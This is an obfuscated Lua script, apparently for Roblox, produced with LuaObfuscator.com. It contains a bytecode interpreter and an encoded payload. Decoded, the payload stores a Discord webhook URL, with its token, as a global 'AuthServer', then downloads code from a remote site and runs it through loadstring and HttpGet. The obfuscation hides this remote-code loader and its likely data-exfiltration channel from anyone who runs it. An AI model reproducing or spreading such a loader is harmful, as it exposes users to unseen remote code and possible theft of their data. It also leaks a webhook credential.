--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.2) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v72=v2(v0(v20,16));if v19 then local v90=v5(v72,v19);v19=nil;return v90;else return v72;end end end);local function v21(v22,v23,v24)if v24 then local v73=0 + 0;local v74;while true do if (v73==(0 + (0 -0))) then v74=(v22/((1493 -(1082 + 409))^(v23-(4 -3))))%((4 -2)^(((v24-1) -(v23-(4 -3))) + 1 + 0));return v74-(v74%(1 -0));end end else local v75=1741 -(1265 + 476);local v76;while true do if ((0 -(0 -0))==v75) then v76=(3 -1)^(v23-(1 + 0));return (((v22%(v76 + v76))>=v76) and 1) or (0 + 0 + (0 -0));end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1;return v38;end local function v26()local v39,v40=v1(v16,v18,v18 + (1420 -(765 + 653)));v18=v18 + 2;return (v40 * (2123 -(1244 + 623))) + v39;end local function v27()local v41=0 + 0;local v42;local v43;local v44;local v45;while true do if (v41==((0 -0) -0)) then v42,v43,v44,v45=v1(v16,v18,v18 + 3 + 0);v18=v18 + (8 -4);v41=4 -(7 -4);end if (v41==1) then return (v45 * (16779118 -(1686 + 216))) + (v44 * 65536) + (v43 * (2142 -(574 + 1312))) + v42;end end end local function v28()local v46=v27();local v47=v27();local v48=1103 -(367 + (1467 -732));local v49=(v21(v47,941 -(322 + 618),20) * ((2 -0)^(32 + 0))) + v46;local v50=v21(v47,60 -39,31 + 0);local v51=((v21(v47,11 + 21)==(3 -2)) and  -(3 -2)) or (1 + 0);if (v50==((10 -(8 + 2)) + 0)) then if (v49==((0 -0) + 0)) then return v51 * (1839 -(455 + 1384));else v50=(244 + 482) -(555 + 170);v48=0;end elseif (v50==((7326 -(256 + 1126)) -3897)) then return ((v49==(0 + 0)) and (v51 * ((1 -(0 -0))/(0 -0)))) or (v51 * NaN);end return v8(v51,v50-(2761 -(621 + 1117))) * (v48 + (v49/((2 -0)^(241 -189))));end local function v29(v30)local v52=0 -0;local v53;local v54;while true do if (v52==((2484 -756) -((4736 -3211) + 47 + 153))) then return v6(v54);end if (v52==(476 -(291 + 43 + 140))) then v54={};for v91=1 + 0, #v53 do v54[v91]=v2(v1(v3(v53,v91,v91)));end v52=4 -1;end if (v52==(0 + (0 -0))) then v53=nil;if  not v30 then v30=v27();if (v30==(1804 -(1590 + 214))) then return "";end end v52=1;end if (v52==(1 + 0)) then v53=v3(v16,v18,(v18 + v30) -(1 + 0));v18=v18 + v30;v52=2 + 0;end end end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v55=0 -0;local v56;local v57;local v58;local v59;local v60;local v61;local v62;local v63;while true do if (v55==(0 + 0)) then v56=0;v57=nil;v55=1;end if (1~=v55) then else v58=nil;v59=nil;v55=2;end if (2==v55) then v60=nil;v61=nil;v55=3;end if (v55==3) then v62=nil;v63=nil;v55=4;end if (v55==4) then while true do if ((820 -(427 + 392))==v56) then local v97=0;while true do if (v97~=1) then else v56=2;break;end if (v97==0) then v59=nil;v60=nil;v97=1;end end end if (v56==(400 -(183 + 214))) then v63=nil;while true do local v102=0;local v103;while true do if (v102==(0 + 0)) then v103=1703 -(497 + 1206);while true do if (v103~=0) then else local v126=0;local v127;while true do if (v126~=(0 + 0)) then else v127=0;while true do if ((1 + 0)==v127) then v103=1 + 0;break;end if (v127==0) then if (v57~=0) then else local v141=0 -0;while true do if (v141==(0 + 0)) then local v151=0;while true do if (v151==0) then v58={};v59={};v151=1 + 0;end if (v151~=(207 -(105 + 101))) then else v141=1 -0;break;end end end if (v141~=(929 -(347 + 581))) then else v60={};v57=1 + 0;break;end end end if (v57~=2) then else local v142=0 + 0;while true do if (v142~=1) then else for v155=1,v27() do local v156=0;local v157;local v158;while true do if (v156~=(0 -0)) then else v157=0 -0;v158=nil;v156=1;end if (v156==1) then while true do if (0==v157) then v158=v25();if (v21(v158,1 + 0,1114 -(755 + 358))==(0 + 0)) then local v169=636 -(7 + 629);local v170;local v171;local v172;local v173;while true do if (v169==0) then v170=0;v171=nil;v169=2 -1;end if (v169==2) then while true do if (v170==3) then if (v21(v172,3,7 -4)==1) then v173[4]=v63[v173[3 + 1]];end v58[v155]=v173;break;end if (1==v170) then local v183=0;while true do if (v183==0) then local v193=0;while true do if (1==v193) then v183=2 -1;break;end if (v193~=(0 + 0)) then else v173={v26(),v26(),nil,nil};if (v171==0) then local v195=0 + 0;local v196;local v197;while true do if (v195==(0 + 0)) then local v199=0 -0;while true do if (v199==0) then v196=0;v197=nil;v199=1 + 0;end if (v199==(1324 -(182 + 1141))) then v195=659 -(172 + 486);break;end end end if (v195~=(1934 -(1306 + 627))) then else while true do if (v196==(0 -0)) then v197=0;while true do if (v197==(0 + 0)) then v173[3 + 0]=v26();v173[1 + 3]=v26();break;end end break;end end break;end end elseif (v171==(4 -3)) then v173[3]=v27();elseif (v171==2) then v173[3]=v27() -((1 + 1)^(1199 -(382 + 801)));elseif (v171~=3) then else local v201=0 -0;local v202;local v203;while true do if (v201==1) then while true do if (v202==0) then v203=0;while true do if (v203==0) then v173[3]=v27() -((2 + 0)^(37 -21));v173[12 -8]=v26();break;end end break;end end break;end if (v201==0) then v202=0;v203=nil;v201=734 -(64 + 669);end end end v193=1 + 0;end end end if (v183==1) then v170=2;break;end end end if (v170~=(1802 -(1783 + 19))) then else local v184=1780 -(1346 + 434);local v185;while true do if (v184~=(77 -(46 + 31))) then else v185=0 + 0;while true do if (v185==1) then v170=1965 -(1452 + 512);break;end if ((0 + 0)~=v185) then else local v194=0 -0;while true do if (v194~=(1 -0)) then else v185=4 -3;break;end if (v194~=0) then else v171=v21(v158,2 + 0,3 + 0);v172=v21(v158,1 + 3,6);v194=985 -(577 + 407);end end end end break;end end end if (v170~=2) then else if (v21(v172,1,3 -2)==(1 -0)) then v173[2]=v63[v173[2 -0]];end if (v21(v172,2,714 -(412 + 300))==(1 + 0)) then v173[3 -0]=v63[v173[3]];end v170=1099 -(118 + 978);end end break;end if (v169~=1) then else v172=nil;v173=nil;v169=2;end end end break;end end break;end end end v57=3 -0;break;end if (v142==0) then local v152=0 -0;while true do if (v152==(0 -0)) then for v164=1556 -(423 + 1132),v62 do local v165=0 -0;local v166;local v167;local v168;while true do if (v165==1) then v168=nil;while true do if (v166~=(1 -0)) then else if (v167==1) then v168=v25()~=(0 -0);elseif (v167==(1030 -(423 + 605))) then v168=v28();elseif (v167==(996 -(935 + 58))) then v168=v29();end v63[v164]=v168;break;end if (v166==(0 -0)) then local v176=1098 -(839 + 259);local v177;while true do if (v176==(1798 -(749 + 1049))) then v177=0 + 0;while true do if (v177==0) then local v186=0;while true do if (v186==0) then v167=v25();v168=nil;v186=1 -0;end if (v186==1) then v177=1 + 0;break;end end end if (v177==(2 -1)) then v166=1;break;end end break;end end end end break;end if (v165==0) then v166=0 -0;v167=nil;v165=1;end end end v61[2 + 1]=v25();v152=1 + 0;end if ((1 + 0)~=v152) then else v142=1;break;end end end end end v127=1 + 0;end end break;end end end if (v103==(2 -1)) then if (1==v57) then local v128=0;local v129;while true do if (v128==0) then v129=0;while true do if (v129==(0 -0)) then local v143=0;while true do if (v143~=(0 -0)) then else v61={v58,v59,nil,v60};v62=v27();v143=1 -0;end if (v143==1) then v129=2 -1;break;end end end if (v129==(1 + 0)) then v63={};v57=2;break;end end break;end end end if (v57~=(7 -4)) then else local v130=0;local v131;while true do if (v130~=0) then else v131=0;while true do local v137=0 + 0;local v138;while true do if (v137==0) then v138=0;while true do if ((387 -(208 + 179))==v138) then if (1==v131) then return v61;end if (v131==0) then local v160=0 -0;local v161;while true do if (v160==(0 + 0)) then v161=0;while true do if (v161==(1 + 0)) then v131=1;break;end if (v161==(1150 -(1055 + 95))) then local v174=0;while true do if (v174==0) then for v178=1,v27() do v59[v178-(1842 -(52 + 1789))]=v33();end for v180=1,v27() do v60[v180]=v27();end v174=1;end if ((1 + 0)==v174) then v161=454 -(445 + 8);break;end end end end break;end end end break;end end break;end end end break;end end end break;end end break;end end end break;end if (2==v56) then local v98=0 + 0;while true do if (v98~=0) then else v61=nil;v62=nil;v98=1;end if (v98~=1) then else v56=3;break;end end end if (v56~=(791 -(18 + 773))) then else local v99=0 -0;local v100;while true do if (v99~=(0 + 0)) then else v100=0 + 0;while true do if (v100==0) then v57=520 -(318 + 202);v58=nil;v100=1;end if (v100~=1) then else v56=1 -0;break;end end break;end end end end break;end end end local function v34(v35,v36,v37)local v64=v35[1];local v65=v35[2];local v66=v35[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1;local function v71()local v77=v64;local v78=v65;local v79=v66;local v80=v32;local v81={};local v82={};local v83={};for v87=0 + 0,v70 do if (((3520 -(145 + 54))<=(21079 -16102)) and (v87>=v79)) then v81[v87-v79]=v69[v87 + (3 -2)];else v83[v87]=v69[v87 + (326 -(95 + 230))];end end local v84=(v70-v79) + 1;local v85;local v86;while true do local v88=0 -0;while true do if (((5419 -((1840 -(399 + 595)) + 566))>(868 + 810 + 220)) and (v88==(1 + 0))) then if ((1459>(2326 -(1596 + 358))) and (v86<=3)) then if (((8533 -4629)>(3403 -(869 + 400))) and (v86<=(870 -(200 + 669)))) then if ((v86>(0 -0)) or ((7489 -4783)<=((5549 -(188 + 1807)) -((2032 -(263 + 1311)) + 1329)))) then v83[v85[2]]();else local v106=0 + (50 -(15 + 35));local v107;local v108;local v109;local v110;while true do if (((9461 -5218)>(2113 -(169 + 141))) and (v106==(213 -(100 + 113)))) then v107=0 + 0;v108=nil;v106=1 + 0;end if ((4760==(3677 + 1083)) and (v106==(3 -(7 -5)))) then v109=nil;v110=nil;v106=2 + 0;end if (((363 + 3799)>(13399 -9279)) and (2==v106)) then while true do if (((1769 -(9 + 15 + 10))==(3026 -(994 + 297))) and (v107==(0 + 0))) then v108=0 + 0;v109=nil;v107=2 -1;end if (((5918 -(187 + 1368))>(3097 -(17 + (549 -177)))) and (v107==(1795 -(5 + 34 + 1755)))) then v110=nil;while true do if (((4521 -2185)<=(9776 -7137)) and (v108==((696 + 222) -(379 + 538)))) then v83[v109 + 1]=v110;v83[v109]=v110[v85[5 -1]];break;end if ((v108==(0 -0)) or ((4242 -(1024 + 539))>4627)) then local v147=0 -0;while true do if ((v147==(0 + 0)) or (2269>=(5311 -(353 + 187)))) then local v153=0 -0;while true do if ((v153==(0 -0)) or ((1298 + 596)>(5166 -(371 + 5)))) then v109=v85[1318 -(1182 + (1469 -(1150 + 185)))];v110=v83[v85[3]];v153=1475 -(1020 + 454);end if (((1080 -(179 + 900))==v153) or (4651==(3715 -(671 + 666)))) then v147=27 -(5 + 21);break;end end end if ((v147==(1 + 0)) or ((2056 -(86 + 1206))>1724)) then v108=1;break;end end end end break;end end break;end end end elseif ((((3167 -956) -(262 + 330))==(614 + 1005)) and (v86==(2 + 0))) then v83[v85[(1147 -674) -(115 + 356)]][v85[3]]=v85[1406 -(376 + 1026)];else v83[v85[3 -1]]=v85[3];end elseif ((((765 + 3212) -(1257 + 425))==(5 + 272 + 2018)) and (v86<=(213 -(23 + 185)))) then if ((v86>(1821 -(1030 + 787))) or ((540 + 49 + (8897 -6047))==(2472 -(1339 + 439)))) then local v115=0 -0;local v116;local v117;while true do if (((8804 -5746)>(194 + 195)) and (v115==(0 + 0))) then v116=0 + 0;v117=nil;v115=(197 + 1422) -(1257 + 361);end if ((v115==(1 + (889 -(638 + 251)))) or (47>=(1896 -(576 + 124)))) then while true do if ((v116==((1510 + 13) -(1512 + 11))) or ((1346 -1002)==4191)) then v117=v85[580 -((1264 -(460 + 559)) + 333)];v83[v117]=v83[v117](v13(v83,v117 + 1,v68));break;end end break;end end else v83[v85[782 -(362 + 418)]]=v37[v85[1 + (898 -(646 + 250))]];end elseif ((v86==(13 -7)) or ((2885 -1300)>=(1561 + 549))) then do return;end else local v120=0;local v121;local v122;local v123;local v124;local v125;while true do if (((6340 -((1553 -(423 + 1002)) + 1236))==(745 + 4231)) and (v120==(1035 -(590 + 443)))) then v125=nil;while true do if ((2661>=(12 + (401 -226))) and (v121==0)) then local v135=251 -(236 + 15);while true do if (((762 + 42)<(5330 -(863 + 792))) and (v135==(711 -(94 + 341 + 276)))) then local v148=0 -(0 -0);while true do if ((v148==0) or (836<=(343 + 206))) then v122=v85[2];v123,v124=v80(v83[v122](v13(v83,v122 + (2 -1),v85[1103 -(188 + 912)])));v148=1;end if (((11986 -7989)>1862) and (v148==(1 + 0))) then v135=1 + 0;break;end end end if ((v135==(3 -2)) or ((6645 -2815)<=1738)) then v121=851 -(565 + 285);break;end end end if ((4396>(3786 -((815 -499) + 44))) and (v121==(1785 -(1418 + 366)))) then local v136=0;while true do if (((2839 + 200)==(1709 + 1330)) and (v136==(0 + 0))) then v68=(v124 + v122) -(1192 -(17 + 1174));v125=0;v136=(1 + 0) -0;end if ((v136==1) or (4933==(811 + 587))) then v121=5 -3;break;end end end if ((v121==((3158 -2100) -(106 + 950))) or ((7590 -3975)<=(4657 -2765))) then for v139=v122,v68 do local v140=0 -0;while true do if (((2496 -1448)<(12170 -(19666 -10722))) and (v140==(717 -((891 -484) + 310)))) then v125=v125 + (1387 -(126 + 1260));v83[v139]=v123[v125];break;end end end break;end end break;end if ((v120==(24 -(13 + 10))) or ((3004 + 901)==3115)) then local v132=0;while true do if (((3383 -2543)<(9390 -6090)) and ((0 -0)==v132)) then v123=nil;v124=nil;v132=1 + 0;end if ((v132==(1390 -(401 + 988))) or ((2176 + 1470)>=(1870 + 2597))) then v120=2;break;end end end if ((((1741 -(228 + 391)) + (597 -339))==((7164 -(1066 + 303)) -4415)) and (v120==(0 + 0))) then v121=0 + 0;v122=nil;v120=(4179 -2721) -(38 + 1419);end end end v67=v67 + 1 + 0;break;end if ((v88==(470 -(165 + 305))) or ((1644 -(1355 + 220))>(1806 -(1057 + 675)))) then local v101=1945 -(1406 + 539);while true do if ((v101==(3 -2)) or ((367 + 1656)<(1862 -(216 + 563)))) then v88=4 -3;break;end if (((5683 -(478 + 1204))>(11520 -8298)) and ((0 -0)==v101)) then v85=v77[v67];v86=v85[1 -0];v101=1 + 0 + 0;end end end end end end A,B=v32(v11(v71));if  not A[1] then local v89=v35[4][v67] or "?";error("Script error at ["   .. v89   .. "]:"   .. A[2]);else return v13(A,2,B);end end;end return v34(v33(),{},v17)(...);end v15("LOL!093O0003023O005F4703053O004F776E657203073O00637265612O6B7A030A3O004175746853657276657203783O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F3938373433363O373233303936323734382F52497252325F654C4F3553634C5F56554B35315851674A54675A577946784F6444533970474653654753437866465846634665643544314D624331792D313934325F705F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574032D3O00682O7470733A2O2F64617269616E6465762E636F6D2F682O74705F7374752O662F66756E6374696F6E2E747874000C3O0012043O00013O0030023O000200030012043O00013O0030023O000400050012043O00063O001204000100073O00202O000100010008001203000300094O0007000100034O00055O00022O00013O000100012O00063O00017O000C3O00023O00023O00033O00033O00043O00043O00043O00043O00043O00043O00043O00053O00",v9(),...);end
